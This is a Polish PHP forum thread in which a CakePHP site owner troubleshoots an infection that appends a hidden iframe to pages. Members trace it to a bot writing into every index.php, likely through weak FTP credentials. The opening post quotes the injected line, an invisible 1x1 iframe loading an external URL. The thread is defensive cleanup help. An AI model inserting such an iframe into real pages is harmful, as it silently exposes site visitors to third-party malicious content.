Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: [CakePHP] Wirus
Forum PHP.pl > Forum > PHP > Frameworki
Bajki
Witam
Wczoraj w jakiś nieznany mi sposób w pliki CakePHP znajdujące się na serwerze (moim) wkradł się jakiś rodzaj wirusa (być może to zdanie jest niepoprawne logicznie ale nie to jest najważniejsze w tej sprawie tongue.gif), który dodaje zaraz po znaczniku </html> taką oto linijke :
  1. <iframe src="http://thedeadpit.com/?click=1336703" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

Powoduje to blokowanie przez niektóre antywirusy(np. AVAST) mojej witryny. Jeśli to coś pomoże, oto adres serwisu : www.hcphotos.pl

Postanowiłem wgrać na serwer nie ruszany folder "cake" jednak problem nie zniknął. Czy ktoś może mi powiedzieć gdzie i czego mam szukać żeby się tego pozbyć? wg. avasta wirus nazywa się "HTML:Iframe-inf".

Pozdrawiam i liczę na pomoc smile.gif
erix
Cytat
Czy ktoś może mi powiedzieć gdzie i czego mam szukać żeby się tego pozbyć? wg. avasta wirus nazywa się "HTML:Iframe-inf".

Albo HTML-Injection, albo ktoś dobrał się do Twojego hasła na FTP. Bardziej prawdopodobna jest pierwsza opcja.
Bajki
kurcze ale niezabardzo gdzie było przeprowadzić html-injection ;/ tzn na stronie nie ma żadnych formularzy i tym podobnych rzeczy, które wypełniał by użytkownik. Jedyne co przychodzi mi do głowy to to, że przez chwilę panel administracyjny znajdujący się pod adresem /admin/ był niezabezpieczony i może wtedy jakiś bot coś narobił...

ale w takim razie co z tym teraz robić ?
pyro
przejrzyj logi, zabezpieczcz pa o ktorym mowiles i usun kod frame'a...
Bajki
heh no właśnie sęk w tym, że tego niema w plikach widoku winksmiley.jpg to jest dodawane...w jakiś tajemniczy dla mnie sposób. Nie wiem czy przez jakiś plik php czy JS...
pyro
może...

auto_prepend_file / auto_append_file?
erix
JS, to nie ta bajka, ~Bajki. winksmiley.jpg

Sprawdź, czy weryfikujesz wszystkie dane pochodzące od usera.
Bajki
Cytat
auto_prepend_file / auto_append_file?
Rozumiem, że takie zmienne(?) pojawiły by się w kontrolerze ?

Cytat
Sprawdź, czy weryfikujesz wszystkie dane pochodzące od usera.
Hmmm myślałem, że CakePHP robi to sam tongue.gif ale skoro nie...to i tak tam niema czego weryfikować ;/ user poprostu ogląda strone główną, lub koncert, lub album z koncertu. Nigdzie niczego nie wpisuje winksmiley.jpg

Ale zauważyłem, że ta linijka dodawana jest tylko w przypadku istniejących kontrolerów tzn kiedy poda się zły adres to wczytuje się domyślny layout, ale linijka nie jest dodawana. Być może to jest jakiś trop...
l0ud
Takie boty w celu kompatybilności najczęściej dopisują się do głównego pliku, czyli index.php i to na jego końcu szukałbym tego kodu. Nie ma co kombinować winksmiley.jpg
Bajki
haha faktycznie exclamation.gif bot dopisał do kazdego pliku index.php na serwerze linijke z tym kodem ! biggrin.gif kurcze dzięki wielkie za pomoc wszystkim ! smile.gif
l0ud
Teraz pozostała Ci zmiana hasła do FTP oraz przeskanowanie programem antywirusowym wszystkich komputerów, na których logowałeś się na FTP. Bo skądś bot musiał mieć to hasło...
Bajki
hmm zarówno login jak i hasło były bardzo łatwe do zgadnięcia winksmiley.jpg więc może to kwestia tego. ale przeskanuje ;P a hasło i login zmienione ;P

dzieki jeszcze raz
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.